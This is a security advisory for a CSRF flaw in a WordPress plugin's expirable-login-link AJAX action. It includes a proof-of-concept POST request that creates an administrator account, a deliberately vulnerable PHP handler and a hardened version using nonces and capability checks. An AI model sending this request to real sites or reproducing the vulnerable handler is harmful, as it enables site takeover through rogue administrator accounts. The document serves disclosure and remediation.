The plugin does not protect its ftlpp-ext-expirable-login-link admin-ajax action against CSRF attacks. Because the handler relies on the session cookie alone, an unauthenticated attacker can create users of any role, including administrator, by tricking a logged-in administrator into submitting a crafted request on their behalf.
POST /wp-admin/admin-ajax.php?action=ftlpp-ext-expirable-login-link HTTP/1.1
Content-Type: application/json
Cookie: [Admin+]

{"firstName":"Evil","email":"[email protected]","role":"administrator","accountLinkExpiry":"999"}
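One caveat on the PoC above: a cross-site HTML form cannot set Content-Type: application/json, so a CSRF delivery page depends on the handler decoding the raw request body regardless of Content-Type (for example via a text/plain form), or on a permissive CORS policy; the advisory does not say which applies, only that no anti-CSRF check exists. The following is an added illustration of the missing check, not the plugin's own code: a hypothetical admin-ajax handler in the vulnerable shape, beside a hardened version that ties the request to a WordPress nonce and a capability check. The function names, the nonce action string "ftlpp_expirable_login_link", the script handle and the request-body field names are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Function names, the nonce action
// string, the script handle and the body field names are assumptions.

// Vulnerable shape: the callback trusts the admin's session cookie alone and
// reads the JSON body as-is, so any page the administrator visits can have the
// browser submit this request and create an "administrator" user.
function ftlpp_expirable_login_link_vulnerable() {
    $data = json_decode( file_get_contents( 'php://input' ), true );

    $user_id = wp_insert_user( array(
        'user_login' => sanitize_user( $data['email'] ),
        'user_email' => sanitize_email( $data['email'] ),
        'first_name' => sanitize_text_field( $data['firstName'] ),
        'role'       => $data['role'],          // attacker-chosen, e.g. "administrator"
        'user_pass'  => wp_generate_password( 32 ),
    ) );

    wp_send_json_success( array( 'user_id' => $user_id ) );
}

// Hardened shape: a nonce bound to the logged-in user's session proves the
// request was built by the plugin's own admin page, and a capability check
// limits who may create users and which roles they may hand out.
function ftlpp_expirable_login_link_hardened() {
    // Expects the nonce as the _ajax_nonce query argument (or _wpnonce);
    // check_ajax_referer() stops the request with HTTP 403 if it is missing or stale.
    check_ajax_referer( 'ftlpp_expirable_login_link', '_ajax_nonce' );

    if ( ! current_user_can( 'create_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $data = json_decode( file_get_contents( 'php://input' ), true );
    if ( ! is_array( $data ) || empty( $data['email'] ) || ! is_email( $data['email'] ) ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // Only roles the current user is allowed to assign (same rule core applies
    // on user-edit.php), so a lower-privileged caller cannot mint administrators.
    $role = isset( $data['role'] ) ? sanitize_key( $data['role'] ) : 'subscriber';
    if ( ! array_key_exists( $role, get_editable_roles() ) ) {
        wp_send_json_error( 'invalid role', 400 );
    }

    $user_id = wp_insert_user( array(
        'user_login' => sanitize_user( $data['email'], true ),
        'user_email' => sanitize_email( $data['email'] ),
        'first_name' => isset( $data['firstName'] ) ? sanitize_text_field( $data['firstName'] ) : '',
        'role'       => $role,
        'user_pass'  => wp_generate_password( 32 ),
    ) );

    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 400 );
    }
    wp_send_json_success( array( 'user_id' => $user_id ) );
}
add_action( 'wp_ajax_ftlpp-ext-expirable-login-link', 'ftlpp_expirable_login_link_hardened' );

// Page side: hand the nonce to the plugin's own admin script so it can append
// ?action=ftlpp-ext-expirable-login-link&_ajax_nonce=... to the request URL.
// A third-party page cannot read this value, which is what defeats the CSRF.
function ftlpp_enqueue_admin_script() {
    wp_enqueue_script( 'ftlpp-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'ftlpp-admin', 'ftlppAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'ftlpp_expirable_login_link' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'ftlpp_enqueue_admin_script' );
```

The nonce is carried in the query string rather than the JSON body because check_ajax_referer() reads it from $_REQUEST; if a plugin prefers to keep it in the body, wp_verify_nonce() on the decoded field gives the same guarantee. The capability check matters independently of the nonce: without it, the endpoint would still let any authenticated user with a valid nonce escalate to administrator.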